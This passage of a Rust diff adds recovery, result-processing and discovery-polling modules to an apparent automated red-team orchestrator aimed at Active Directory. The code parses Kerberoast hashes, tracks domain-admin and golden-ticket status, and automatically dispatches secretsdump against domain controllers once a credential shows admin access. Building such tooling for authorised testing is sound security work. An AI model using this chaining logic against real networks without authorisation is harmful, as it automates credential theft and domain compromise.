"contoso.local".to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }]; + + let netbios_map = HashMap::new(); + let fixed = normalize_credential_domains(&mut creds, &netbios_map); + assert_eq!(fixed, 0, "FQDN domain should not be touched"); + } + + #[test] + fn test_resolve_domain_empty_and_dotted() { + let map = HashMap::new(); + assert!(resolve_domain("", &map).is_none(), "Empty domain -> None"); + assert!( + resolve_domain("already.fqdn.local", &map).is_none(), + "Dotted domain -> None" + ); + } + + #[test] + fn test_resolve_domain_case_insensitive_lookup() { + let mut map = HashMap::new(); + map.insert("CONTOSO".to_string(), "contoso.local".to_string()); + + assert_eq!( + resolve_domain("contoso", &map), + Some("contoso.local".to_string()), + "Lowercase input should match uppercase key via to_uppercase" + ); + assert_eq!( + resolve_domain("CONTOSO", &map), + Some("contoso.local".to_string()), + ); + assert_eq!( + resolve_domain("Contoso", &map), + Some("contoso.local".to_string()), + ); + } + + // --- Kerberoast SPN extraction --- + + #[test] + fn test_extract_kerberoast_spn_key_valid() { + let hash = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$chk$enc"; + let result = extract_kerberoast_spn_key(hash); + assert_eq!(result, Some("23:MSSQLSvc/db01.contoso.local".to_string())); + } + + #[test] + fn test_extract_kerberoast_spn_key_invalid() { + assert!(extract_kerberoast_spn_key("not_a_krb_hash").is_none()); + assert!(extract_kerberoast_spn_key("$krb5tgs$").is_none()); + assert!(extract_kerberoast_spn_key("$krb5tgs$23$nope").is_none()); + } + + // --- Connection error detection --- + + #[test] + fn test_is_connection_error() { + let conn_err = anyhow::anyhow!("Connection reset by peer"); + assert!(is_connection_error(&conn_err)); + + let timeout_err = anyhow::anyhow!("Operation TIMEOUT after 30s"); + assert!(is_connection_error(&timeout_err)); + + let broken = anyhow::anyhow!("Broken pipe"); + assert!(is_connection_error(&broken)); + + let normal = anyhow::anyhow!("Key not found"); + assert!(!is_connection_error(&normal)); + } +} diff --git a/ares-cli/src/orchestrator/recovery/normalize.rs b/ares-cli/src/orchestrator/recovery/normalize.rs new file mode 100644 index 00000000..5271bfa3 --- /dev/null +++ b/ares-cli/src/orchestrator/recovery/normalize.rs @@ -0,0 +1,171 @@ +//! State normalization: fix NetBIOS -> FQDN domain mismatches. + +use std::collections::HashMap; + +use ares_core::models::{Credential, Hash}; + +/// If `domain` is a NetBIOS name (no dots, uppercase-ish), look it up in the +/// map and return the FQDN if found. Returns `None` if no fixup is needed. +pub fn resolve_domain(domain: &str, netbios_map: &HashMap) -> Option { + let trimmed = domain.trim(); + if trimmed.is_empty() || trimmed.contains('.') { + // Already FQDN or empty + return None; + } + // Look up the NetBIOS name (case-insensitive) + let upper = trimmed.to_uppercase(); + netbios_map + .get(&upper) + .or_else(|| netbios_map.get(trimmed)) + .or_else(|| netbios_map.get(&trimmed.to_lowercase())) + .cloned() +} + +/// Generic domain normalizer: applies `resolve_domain` to each item's domain, +/// mutating in place via the provided accessor. Returns the count of items fixed. +fn normalize_domains( + items: &mut [T], + netbios_map: &HashMap, + get_domain: F, +) -> usize +where + F: Fn(&mut T) -> &mut String, +{ + let mut fixed = 0; + for item in items.iter_mut() { + let domain = get_domain(item); + if let Some(fqdn) = resolve_domain(domain, netbios_map) { + *domain = fqdn; + fixed += 1; + } + } + fixed +} + +/// Fix credential domains: replace NetBIOS names with FQDNs where the +/// `netbios_to_fqdn` map provides a mapping. +/// +/// Returns the number of credentials fixed. +pub fn normalize_credential_domains( + credentials: &mut [Credential], + netbios_map: &HashMap, +) -> usize { + normalize_domains(credentials, netbios_map, |c| &mut c.domain) +} + +/// Fix hash domains: replace NetBIOS names with FQDNs where the +/// `netbios_to_fqdn` map provides a mapping. +/// +/// Returns the number of hashes fixed. +pub fn normalize_hash_domains(hashes: &mut [Hash], netbios_map: &HashMap) -> usize { + normalize_domains(hashes, netbios_map, |h| &mut h.domain) +} + +#[cfg(test)] +mod tests { + use super::*; + + fn make_map() -> HashMap { + let mut m = HashMap::new(); + m.insert("CONTOSO".to_string(), "contoso.local".to_string()); + m.insert("FABRIKAM".to_string(), "fabrikam.local".to_string()); + m + } + + #[test] + fn test_resolve_domain_netbios_to_fqdn() { + let map = make_map(); + assert_eq!( + resolve_domain("CONTOSO", &map), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn test_resolve_domain_case_insensitive() { + let map = make_map(); + assert_eq!( + resolve_domain("contoso", &map), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn test_resolve_domain_already_fqdn() { + let map = make_map(); + assert_eq!(resolve_domain("contoso.local", &map), None); + } + + #[test] + fn test_resolve_domain_empty() { + let map = make_map(); + assert_eq!(resolve_domain("", &map), None); + } + + #[test] + fn test_resolve_domain_unknown_netbios() { + let map = make_map(); + assert_eq!(resolve_domain("UNKNOWN", &map), None); + } + + #[test] + fn test_normalize_credential_domains() { + let map = make_map(); + let mut creds = vec![ + Credential { + id: String::new(), + username: "admin".to_string(), + password: "P@ss1".to_string(), + domain: "CONTOSO".to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }, + Credential { + id: String::new(), + username: "jdoe".to_string(), + password: "P@ss2".to_string(), + domain: "contoso.local".to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }, + ]; + let fixed = normalize_credential_domains(&mut creds, &map); + assert_eq!(fixed, 1); + assert_eq!(creds[0].domain, "contoso.local"); + assert_eq!(creds[1].domain, "contoso.local"); // unchanged + } + + #[test] + fn test_normalize_hash_domains() { + let map = make_map(); + let mut hashes = vec![Hash { + id: String::new(), + username: "admin".to_string(), + hash_value: "aabbccdd".to_string(), + hash_type: "ntlm".to_string(), + domain: "FABRIKAM".to_string(), + cracked_password: None, + source: String::new(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + }]; + let fixed = normalize_hash_domains(&mut hashes, &map); + assert_eq!(fixed, 1); + assert_eq!(hashes[0].domain, "fabrikam.local"); + } + + #[test] + fn test_normalize_empty_slice() { + let map = make_map(); + let mut creds: Vec = vec![]; + assert_eq!(normalize_credential_domains(&mut creds, &map), 0); + } +} diff --git a/ares-cli/src/orchestrator/recovery/requeue.rs b/ares-cli/src/orchestrator/recovery/requeue.rs new file mode 100644 index 00000000..f26baf56 --- /dev/null +++ b/ares-cli/src/orchestrator/recovery/requeue.rs @@ -0,0 +1,59 @@ +//! Task requeuing (preserves original task_id). + +use anyhow::{Context, Result}; +use redis::AsyncCommands; +use tracing::info; + +use ares_core::models::TaskInfo; + +use crate::orchestrator::task_queue::{ + TaskMessage, TaskQueue, RESULT_QUEUE_PREFIX, TASK_QUEUE_PREFIX, +}; + +/// Requeue a task to its target role queue, preserving the original task_id. +/// +/// Uses RPUSH so retried tasks are consumed before new ones (workers BRPOP +/// from the right). +pub async fn requeue_task(queue: &TaskQueue, task_id: &str, task: &TaskInfo) -> Result<()> { + let mut payload = task + .params + .iter() + .map(|(k, v)| (k.clone(), v.clone())) + .collect::>(); + + // Add retry metadata + payload.insert( + "_retry_count".to_string(), + serde_json::Value::from(task.retry_count), + ); + payload.insert("_is_retry".to_string(), serde_json::Value::Bool(true)); + + let callback_queue = format!("{RESULT_QUEUE_PREFIX}:{task_id}"); + let msg = TaskMessage { + task_id: task_id.to_string(), + task_type: task.task_type.clone(), + source_agent: "orchestrator".to_string(), + target_agent: task.assigned_agent.clone(), + payload: serde_json::Value::Object(payload), + priority: 1, // High priority for retries + created_at: Some(chrono::Utc::now()), + callback_queue: Some(callback_queue), + }; + + let queue_key = format!("{TASK_QUEUE_PREFIX}:{}", task.assigned_agent); + let json = serde_json::to_string(&msg).context("Failed to serialize requeue TaskMessage")?; + + let mut conn = queue.connection(); + conn.rpush::<_, _, ()>(&queue_key, &json) + .await + .with_context(|| format!("RPUSH to {} for requeue", queue_key))?; + + info!( + task_id = %task_id, + queue = %queue_key, + retry_count = task.retry_count, + "Requeued task (RPUSH)" + ); + + Ok(()) +} diff --git a/ares-cli/src/orchestrator/recovery/resume_helper.rs b/ares-cli/src/orchestrator/recovery/resume_helper.rs new file mode 100644 index 00000000..1f5a73f4 --- /dev/null +++ b/ares-cli/src/orchestrator/recovery/resume_helper.rs @@ -0,0 +1,165 @@ +//! Post-recovery analysis helper. + +use std::collections::HashMap; +use std::fmt::Write as _; + +use ares_core::models::{Hash, SharedRedTeamState, TaskInfo, VulnerabilityInfo}; + +use super::types::{InterruptedTask, RetryingTask}; + +/// Post-recovery analysis helper. +/// +/// Provides convenience methods to inspect the recovered state and produce +/// a human-readable summary for the orchestrator. +#[allow(dead_code)] +pub struct OperationResumeHelper<'a> { + pub state: &'a SharedRedTeamState, + pub requeued_task_ids: &'a [String], + pub failed_task_ids: &'a [String], + /// Pending tasks loaded during recovery (task_id -> TaskInfo). + pub pending_tasks: &'a HashMap, +} + +#[allow(dead_code)] +impl<'a> OperationResumeHelper<'a> { + /// Get tasks that permanently failed (exceeded max retries during recovery). + pub fn get_interrupted_tasks(&self) -> Vec { + let mut out = Vec::new(); + for task_id in self.failed_task_ids { + if let Some(task) = self.pending_tasks.get(task_id) { + out.push(InterruptedTask { + task_id: task_id.clone(), + task_type: task.task_type.clone(), + assigned_agent: task.assigned_agent.clone(), + retry_count: task.retry_count, + error: task.error.clone().unwrap_or_default(), + }); + } + } + out + } + + /// Get tasks that were auto-requeued and are currently retrying. + pub fn get_retrying_tasks(&self) -> Vec { + let mut out = Vec::new(); + for task_id in self.requeued_task_ids { + if let Some(task) = self.pending_tasks.get(task_id) { + out.push(RetryingTask { + task_id: task_id.clone(), + task_type: task.task_type.clone(), + assigned_agent: task.assigned_agent.clone(), + retry_count: task.retry_count, + max_retries: task.max_retries, + }); + } + } + out + } + + /// Get vulnerabilities that have been discovered but not yet exploited. + pub fn get_unexploited_vulnerabilities(&self) -> Vec<&VulnerabilityInfo> { + let mut vulns: Vec<&VulnerabilityInfo> = self + .state + .discovered_vulnerabilities + .values() + .filter(|v| !self.state.exploited_vulnerabilities.contains(&v.vuln_id)) + .collect(); + vulns.sort_by_key(|v| v.priority); + vulns + } + + /// Get hashes that have not been cracked yet. + pub fn get_uncracked_hashes(&self) -> Vec<&Hash> { + self.state + .all_hashes + .iter() + .filter(|h| h.cracked_password.is_none()) + .collect() + } + + /// Generate a human-readable summary of the recovery state. + pub fn get_resume_summary(&self) -> String { + let mut s = String::new(); + + let _ = writeln!(s, "OPERATION RESUMED AFTER RECOVERY"); + let _ = writeln!(s, "{}", "=".repeat(50)); + let _ = writeln!(s); + let _ = writeln!(s, "Operation ID: {}", self.state.operation_id); + let _ = writeln!(s, "Credentials found: {}", self.state.all_credentials.len()); + let _ = writeln!(s, "Hosts discovered: {}", self.state.all_hosts.len()); + let _ = writeln!( + s, + "Domain admin: {}", + if self.state.has_domain_admin { + "YES" + } else { + "NO" + } + ); + let _ = writeln!(s); + + // Retrying tasks + let retrying = self.get_retrying_tasks(); + if !retrying.is_empty() { + let _ = writeln!(s, "[RETRYING] {} tasks auto-requeued:", retrying.len()); + for task in retrying.iter().take(5) { + let _ = writeln!( + s, + " - {} -> {} (retry {}/{})", + task.task_type, task.assigned_agent, task.retry_count, task.max_retries + ); + } + let _ = writeln!(s); + } + + // Permanently failed tasks + let interrupted = self.get_interrupted_tasks(); + if !interrupted.is_empty() { + let _ = writeln!( + s, + "[FAILED] {} tasks exceeded max retries:", + interrupted.len() + ); + for task in interrupted.iter().take(5) { + let _ = writeln!( + s, + " - {} -> {} (retried {}x)", + task.task_type, task.assigned_agent, task.retry_count + ); + } + let _ = writeln!(s); + } + + // Unexploited vulnerabilities + let unexploited = self.get_unexploited_vulnerabilities(); + if !unexploited.is_empty() { + let _ = writeln!( + s, + "[PENDING] {} unexploited vulnerabilities:", + unexploited.len() + ); + for v in unexploited.iter().take(5) { + let _ = writeln!( + s, + " - {}: {} (priority {})", + v.vuln_type, v.target, v.priority + ); + } + let _ = writeln!(s); + } + + // Uncracked hashes + let uncracked = self.get_uncracked_hashes(); + if !uncracked.is_empty() { + let _ = writeln!(s, "[PENDING] {} uncracked hashes", uncracked.len()); + let _ = writeln!(s); + } + + if retrying.is_empty() && interrupted.is_empty() { + let _ = writeln!(s, "[OK] No interrupted tasks - clean recovery"); + let _ = writeln!(s); + } + + s + } +} diff --git a/ares-cli/src/orchestrator/recovery/types.rs b/ares-cli/src/orchestrator/recovery/types.rs new file mode 100644 index 00000000..cc68ebce --- /dev/null +++ b/ares-cli/src/orchestrator/recovery/types.rs @@ -0,0 +1,127 @@ +//! Types and constants for operation recovery. + +use ares_core::models::{SharedRedTeamState, TaskStatus}; + +/// Maximum number of retries before a task is considered permanently failed. +pub const MAX_RETRIES: i32 = 3; + +/// Statuses that indicate an interrupted task eligible for re-enqueue. +pub const INTERRUPTED_STATUSES: &[TaskStatus] = &[ + TaskStatus::Pending, + TaskStatus::InProgress, + TaskStatus::Retrying, +]; + +/// Keywords that signal a transient Redis connection error. +pub const CONNECTION_ERROR_KEYWORDS: &[&str] = &[ + "connection", + "connect", + "closed", + "timeout", + "broken pipe", + "reset", + "reading from", +]; + +/// Maximum number of retry attempts for transient Redis connection errors. +pub const MAX_CONNECTION_RETRIES: u32 = 3; + +/// Check if an error looks like a transient Redis connection failure. +pub fn is_connection_error(err: &anyhow::Error) -> bool { + let msg = err.to_string().to_lowercase(); + CONNECTION_ERROR_KEYWORDS.iter().any(|kw| msg.contains(kw)) +} + +/// Result of a recovery operation. +#[derive(Debug)] +#[allow(dead_code)] +pub struct RecoveredState { + /// The full shared state loaded from Redis. + pub state: SharedRedTeamState, + /// Task IDs that were re-enqueued for retry. + pub requeued_task_ids: Vec, + /// Task IDs that exceeded max retries and were marked failed. + pub failed_task_ids: Vec, +} + +/// Info about a permanently failed task (exceeded max retries). +#[derive(Debug, Clone)] +#[allow(dead_code)] +pub struct InterruptedTask { + pub task_id: String, + pub task_type: String, + pub assigned_agent: String, + pub retry_count: i32, + pub error: String, +} + +/// Info about a task that was auto-requeued for retry. +#[derive(Debug, Clone)] +#[allow(dead_code)] +pub struct RetryingTask { + pub task_id: String, + pub task_type: String, + pub assigned_agent: String, + pub retry_count: i32, + pub max_retries: i32, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_is_connection_error_connection() { + let err = anyhow::anyhow!("Redis connection refused"); + assert!(is_connection_error(&err)); + } + + #[test] + fn test_is_connection_error_timeout() { + let err = anyhow::anyhow!("Operation timeout after 30s"); + assert!(is_connection_error(&err)); + } + + #[test] + fn test_is_connection_error_broken_pipe() { + let err = anyhow::anyhow!("Broken pipe while writing"); + assert!(is_connection_error(&err)); + } + + #[test] + fn test_is_connection_error_reset() { + let err = anyhow::anyhow!("Connection reset by peer"); + assert!(is_connection_error(&err)); + } + + #[test] + fn test_is_connection_error_closed() { + let err = anyhow::anyhow!("Socket closed unexpectedly"); + assert!(is_connection_error(&err)); + } + + #[test] + fn test_is_connection_error_case_insensitive() { + let err = anyhow::anyhow!("TIMEOUT waiting for response"); + assert!(is_connection_error(&err)); + } + + #[test] + fn test_is_not_connection_error() { + let err = anyhow::anyhow!("Key not found in Redis"); + assert!(!is_connection_error(&err)); + } + + #[test] + fn test_is_not_connection_error_parse() { + let err = anyhow::anyhow!("Failed to parse JSON response"); + assert!(!is_connection_error(&err)); + } + + #[test] + fn test_constants() { + assert_eq!(MAX_RETRIES, 3); + assert_eq!(MAX_CONNECTION_RETRIES, 3); + assert_eq!(INTERRUPTED_STATUSES.len(), 3); + } +} diff --git a/ares-cli/src/orchestrator/result_processing/admin_checks.rs b/ares-cli/src/orchestrator/result_processing/admin_checks.rs new file mode 100644 index 00000000..9cf3b66b --- /dev/null +++ b/ares-cli/src/orchestrator/result_processing/admin_checks.rs @@ -0,0 +1,328 @@ +//! Domain admin indicator checks, golden ticket detection, Pwn3d! credential +//! upgrades, and domain SID extraction. + +use std::sync::Arc; + +use serde_json::Value; +use tracing::{info, warn}; + +use super::parsing::has_domain_admin_indicator; +use crate::orchestrator::dispatcher::Dispatcher; + +/// Check result for domain admin indicators and update state. +pub(crate) async fn check_domain_admin_indicators(payload: &Value, dispatcher: &Arc) { + if !has_domain_admin_indicator(payload) { + return; + } + let already_da = { + let state = dispatcher.state.read().await; + state.has_domain_admin + }; + let path = if payload.get("has_domain_admin").and_then(|v| v.as_bool()) == Some(true) { + payload + .get("domain_admin_path") + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) + } else { + Some("secretsdump -> krbtgt hash".to_string()) + }; + if let Err(e) = dispatcher + .state + .set_domain_admin(&dispatcher.queue, path.clone()) + .await + { + warn!(err = %e, "Failed to set domain admin flag"); + } else { + info!("Domain Admin achieved!"); + } + if !already_da { + let (domain, dc_target) = { + let state = dispatcher.state.read().await; + let domain = state.domains.first().cloned().unwrap_or_default(); + let dc = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned() + .unwrap_or_else(|| domain.clone()); + (domain, dc) + }; + if !domain.is_empty() { + let vuln_id = format!("domain_admin_{}", domain.to_lowercase()); + let mut details = std::collections::HashMap::new(); + details.insert("domain".into(), serde_json::Value::String(domain.clone())); + if let Some(ref p) = path { + details.insert("path".into(), serde_json::Value::String(p.clone())); + } + details.insert( + "note".into(), + serde_json::Value::String( + "Domain admin achieved via agent-reported indicator".to_string(), + ), + ); + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: vuln_id.clone(), + vuln_type: "domain_admin".to_string(), + target: dc_target, + discovered_by: "result_processing".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 1, + }; + let _ = dispatcher + .state + .publish_vulnerability(&dispatcher.queue, vuln) + .await; + let _ = dispatcher + .state + .mark_exploited(&dispatcher.queue, &vuln_id) + .await; + } + } +} + +pub(crate) async fn check_golden_ticket_completion( + payload: &Value, + task_id: &str, + dispatcher: &Arc, +) { + if !task_id.contains("exploit") && !task_id.contains("golden") { + return; + } + { + let state = dispatcher.state.read().await; + if state.has_golden_ticket { + return; + } + } + let mut found_ticket = false; + let mut domain = String::new(); + if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { + for item in arr { + let text = item + .as_str() + .or_else(|| item.get("output").and_then(|v| v.as_str())) + .unwrap_or(""); + if text.contains("Saving ticket in") && text.contains(".ccache") { + found_ticket = true; + break; + } + } + } + if !found_ticket { + for key in &["tool_output", "output", "summary"] { + if let Some(text) = payload.get(*key).and_then(|v| v.as_str()) { + if text.contains("Saving ticket in") && text.contains(".ccache") { + found_ticket = true; + break; + } + } + } + } + if !found_ticket && payload.get("has_golden_ticket").and_then(|v| v.as_bool()) == Some(true) { + found_ticket = true; + } + if !found_ticket { + return; + } + if let Some(d) = payload.get("domain").and_then(|v| v.as_str()) { + domain = d.to_string(); + } + if domain.is_empty() { + let state = dispatcher.state.read().await; + domain = state.domains.first().cloned().unwrap_or_default(); + } + if let Err(e) = dispatcher + .state + .set_golden_ticket(&dispatcher.queue, &domain) + .await + { + warn!(err = %e, "Failed to set golden ticket flag"); + } +} + +pub(crate) async fn detect_and_upgrade_admin_credentials(text: &str, dispatcher: &Arc) { + for line in text.lines() { + if !line.contains("Pwn3d!") || !line.contains("[+]") { + continue; + } + if let Some(after_plus) = line.split("[+]").nth(1) { + let after_plus = after_plus.trim(); + if let Some(backslash) = after_plus.find('\\') { + let domain_part = after_plus[..backslash].trim(); + let rest = &after_plus[backslash + 1..]; + let username = if let Some(colon) = rest.find(':') { + &rest[..colon] + } else { + rest.split_whitespace().next().unwrap_or("") + }; + let username = username.trim(); + let domain = domain_part.to_lowercase(); + if username.is_empty() || domain.is_empty() { + continue; + } + info!(username = %username, domain = %domain, "Pwn3d! detected -- upgrading credential to admin"); + let upgraded = { + let mut state = dispatcher.state.write().await; + let mut found = false; + for cred in state.credentials.iter_mut() { + if cred.username.to_lowercase() == username.to_lowercase() + && cred.domain.to_lowercase() == domain + && !cred.is_admin + { + cred.is_admin = true; + found = true; + } + } + found + }; + if upgraded { + let pwned_ip = line + .split_whitespace() + .find(|w| { + w.split('.').count() == 4 + && w.split('.').all(|o| o.parse::().is_ok()) + }) + .map(|s| s.to_string()); + info!( + username = %username, + domain = %domain, + pwned_host = ?pwned_ip, + "Credential upgraded to admin -- dispatching priority secretsdump" + ); + let work: Vec<(String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + let dc_ips: Vec = + state.domain_controllers.values().cloned().collect(); + let mut targets: Vec = dc_ips; + if let Some(ref ip) = pwned_ip { + if !targets.contains(ip) { + targets.push(ip.clone()); + } + } + state + .credentials + .iter() + .filter(|c| { + c.username.to_lowercase() == username.to_lowercase() + && c.domain.to_lowercase() == domain + && c.is_admin + }) + .flat_map(|cred| { + targets + .iter() + .map(|ip| (ip.clone(), cred.clone())) + .collect::>() + }) + .collect() + }; + for (target_ip, cred) in work { + match dispatcher.request_secretsdump(&target_ip, &cred, 1).await { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %target_ip, + username = %username, + "Admin Pwn3d! secretsdump dispatched (priority 1)" + ); + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch Pwn3d! secretsdump"), + } + } + } + } + } + } +} + +pub(crate) async fn extract_and_cache_domain_sid(payload: &Value, dispatcher: &Arc) { + let mut text_parts: Vec<&str> = Vec::new(); + for key in &["tool_output", "output"] { + if let Some(s) = payload.get(*key).and_then(|v| v.as_str()) { + text_parts.push(s); + } + } + if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { + for item in arr { + if let Some(s) = item.as_str() { + text_parts.push(s); + } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { + text_parts.push(s); + } + } + } + if text_parts.is_empty() { + return; + } + let combined = text_parts.join("\n"); + if let Some(sid) = ares_core::parsing::extract_domain_sid(&combined) { + let domain = payload + .get("domain") + .and_then(|v| v.as_str()) + .map(|d| d.to_lowercase()) + .filter(|d| !d.is_empty()); + let domain = match domain { + Some(d) => d, + None => { + let state = dispatcher.state.read().await; + match state.domains.first() { + Some(d) => d.to_lowercase(), + None => return, + } + } + }; + let already_cached = { + let state = dispatcher.state.read().await; + state + .domain_sids + .get(&domain) + .map(|s| s == &sid) + .unwrap_or(false) + }; + if !already_cached { + let op_id = { + let state = dispatcher.state.read().await; + state.operation_id.clone() + }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + if let Err(e) = reader.set_domain_sid(&mut conn, &domain, &sid).await { + warn!(err = %e, domain = %domain, "Failed to persist domain SID to Redis"); + } else { + info!(domain = %domain, sid = %sid, "Domain SID cached from task output"); + dispatcher + .state + .write() + .await + .domain_sids + .insert(domain.clone(), sid); + } + } + if let Some(admin_name) = ares_core::parsing::extract_rid500_name(&combined) { + let already_known = { + let state = dispatcher.state.read().await; + state.admin_names.contains_key(&domain) + }; + if !already_known { + let op_id = { + let state = dispatcher.state.read().await; + state.operation_id.clone() + }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + if let Err(e) = reader.set_admin_name(&mut conn, &domain, &admin_name).await { + warn!(err = %e, domain = %domain, "Failed to persist admin name to Redis"); + } else { + info!(domain = %domain, name = %admin_name, "RID-500 account name cached from task output"); + dispatcher + .state + .write() + .await + .admin_names + .insert(domain, admin_name); + } + } + } + } +} diff --git a/ares-cli/src/orchestrator/result_processing/discovery_polling.rs b/ares-cli/src/orchestrator/result_processing/discovery_polling.rs new file mode 100644 index 00000000..54502782 --- /dev/null +++ b/ares-cli/src/orchestrator/result_processing/discovery_polling.rs @@ -0,0 +1,190 @@ +//! Background discovery polling. + +use std::sync::Arc; +use std::time::Duration; + +use anyhow::Result; +use redis::AsyncCommands; +use serde_json::Value; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use ares_core::models::{Credential, Hash, Host, Share, User, VulnerabilityInfo}; + +use super::parsing::resolve_parent_id; +use super::LOCKOUT_PATTERNS; +use crate::orchestrator::dispatcher::Dispatcher; + +pub async fn discovery_poller(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(5)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + if let Err(e) = poll_discoveries(&dispatcher).await { + debug!(err = %e, "Discovery poll error"); + } + } +} + +async fn poll_discoveries(dispatcher: &Dispatcher) -> Result<()> { + let key = dispatcher.state.discovery_key().await; + let mut conn = dispatcher.queue.connection(); + let discoveries: Vec = conn.lrange(&key, 0, -1).await.unwrap_or_default(); + if discoveries.is_empty() { + return Ok(()); + } + let _: () = conn.del(&key).await?; + info!( + count = discoveries.len(), + "Processing real-time discoveries" + ); + for json_str in &discoveries { + let discovery: Value = match serde_json::from_str(json_str) { + Ok(v) => v, + Err(e) => { + warn!(err = %e, "Bad discovery JSON"); + continue; + } + }; + let disc_type = discovery + .get("type") + .and_then(|v| v.as_str()) + .unwrap_or("unknown"); + let data = match discovery.get("data") { + Some(d) => d, + None => continue, + }; + let input_username = discovery.get("input_username").and_then(|v| v.as_str()); + let input_domain = discovery.get("input_domain").and_then(|v| v.as_str()); + match disc_type { + "credential" => match serde_json::from_value::(data.clone()) { + Ok(mut cred) => { + if cred.parent_id.is_none() { + let state = dispatcher.state.read().await; + let (pid, step) = resolve_parent_id( + &state.credentials, + &state.hashes, + &cred.source, + &cred.username, + &cred.domain, + input_username, + input_domain, + ); + cred.parent_id = pid; + cred.attack_step = step; + drop(state); + } + let user_domain = format!("{}@{}", cred.username, cred.domain); + match dispatcher + .state + .publish_credential(&dispatcher.queue, cred) + .await + { + Ok(true) => { + info!(credential = %user_domain, "Discovery: credential published") + } + Ok(false) => { + debug!(credential = %user_domain, "Discovery: credential already known") + } + Err(e) => { + warn!(err = %e, credential = %user_domain, "Failed to publish discovered credential") + } + } + } + Err(e) => warn!(err = %e, "Failed to deserialize credential discovery"), + }, + "hash" => { + if let Ok(mut hash) = serde_json::from_value::(data.clone()) { + if hash.parent_id.is_none() { + let state = dispatcher.state.read().await; + let (pid, step) = resolve_parent_id( + &state.credentials, + &state.hashes, + &hash.source, + &hash.username, + &hash.domain, + input_username, + input_domain, + ); + hash.parent_id = pid; + hash.attack_step = step; + drop(state); + } + let _ = dispatcher.state.publish_hash(&dispatcher.queue, hash).await; + } + } + "vulnerability" | "delegation" => { + if let Ok(vuln) = serde_json::from_value::(data.clone()) { + let _ = dispatcher + .state + .publish_vulnerability(&dispatcher.queue, vuln) + .await; + } + } + "host" => match serde_json::from_value::(data.clone()) { + Ok(host) => { + let _ = dispatcher.state.publish_host(&dispatcher.queue, host).await; + } + Err(e) => { + warn!(err = %e, data = %data, "Failed to deserialize host discovery"); + } + }, + "share" => { + if let Ok(share) = serde_json::from_value::(data.clone()) { + let _ = dispatcher + .state + .publish_share(&dispatcher.queue, share) + .await; + } + } + "user" => { + if let Ok(user) = serde_json::from_value::(data.clone()) { + if ["kerberos_enum", "netexec_user_enum"].contains(&user.source.as_str()) { + let _ = dispatcher.state.publish_user(&dispatcher.queue, user).await; + } + } + } + other => { + debug!(disc_type = other, "Unknown discovery type, ignoring"); + } + } + } + dispatcher.credential_access_notify.notify_waiters(); + dispatcher.delegation_notify.notify_waiters(); + let _ = dispatcher.notify_state_update().await; + Ok(()) +} + +/// Check if a task result contains lockout error indicators. +pub(crate) fn has_lockout_in_result(result: &crate::orchestrator::task_queue::TaskResult) -> bool { + if let Some(ref err) = result.error { + if LOCKOUT_PATTERNS.iter().any(|p| err.contains(p)) { + return true; + } + } + if let Some(ref payload) = result.result { + if let Some(outputs) = payload.get("tool_outputs").and_then(|v| v.as_array()) { + for output in outputs { + if let Some(text) = output.as_str() { + if LOCKOUT_PATTERNS.iter().any(|p| text.contains(p)) { + return true; + } + } + } + } + for key in &["summary", "output", "tool_output"] { + if let Some(text) = payload.get(*key).and_then(|v| v.as_str()) { + if LOCKOUT_PATTERNS.iter().any(|p| text.contains(p)) { + return true; + } + } + } + } + false +} diff --git a/ares-cli/src/orchestrator/result_processing/mod.rs b/ares-cli/src/orchestrator/result_processing/mod.rs new file mode 100644 index 00000000..c8567695 --- /dev/null +++ b/ares-cli/src/orchestrator/result_processing/mod.rs @@ -0,0 +1,611 @@ +//! Result processing and discovery polling. +//! +//! Handles completed task results: extracts discovered credentials, hashes, +//! hosts, and vulnerabilities from result payloads and publishes them to +//! shared state and Redis. +//! +//! Also polls the `ares:discoveries:{op_id}` LIST for real-time worker +//! discoveries that arrive outside the task result flow. + +pub mod admin_checks; +pub mod discovery_polling; +pub mod parsing; +#[cfg(test)] +mod tests; +pub mod timeline; + +// Re-exports consumed by callers outside this module +pub use discovery_polling::discovery_poller; + +use std::sync::Arc; + +use anyhow::Result; +use serde_json::Value; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::output_extraction; +use crate::orchestrator::results::CompletedTask; +use crate::orchestrator::throttling::Throttler; + +use self::admin_checks::{ + check_domain_admin_indicators, check_golden_ticket_completion, + detect_and_upgrade_admin_credentials, extract_and_cache_domain_sid, +}; +use self::discovery_polling::has_lockout_in_result; +use self::parsing::{parse_discoveries, resolve_parent_id}; +use self::timeline::{create_credential_timeline_event, create_hash_timeline_event}; + +/// Kerberos/SMB errors that indicate a credential is locked out. +pub(crate) const LOCKOUT_PATTERNS: &[&str] = + &["KDC_ERR_CLIENT_REVOKED", "STATUS_ACCOUNT_LOCKED_OUT"]; + +/// Process a completed task result: extract discoveries and update state. +pub async fn process_completed_task( + completed: &CompletedTask, + dispatcher: &Arc, + throttler: 